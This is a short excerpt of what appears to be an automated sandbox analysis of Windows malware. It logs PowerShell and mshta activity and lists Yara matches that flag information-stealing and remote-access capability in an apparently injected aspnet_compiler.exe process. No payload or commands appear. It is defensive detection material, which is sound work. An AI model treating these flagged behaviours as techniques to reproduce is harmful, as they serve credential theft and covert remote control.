Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY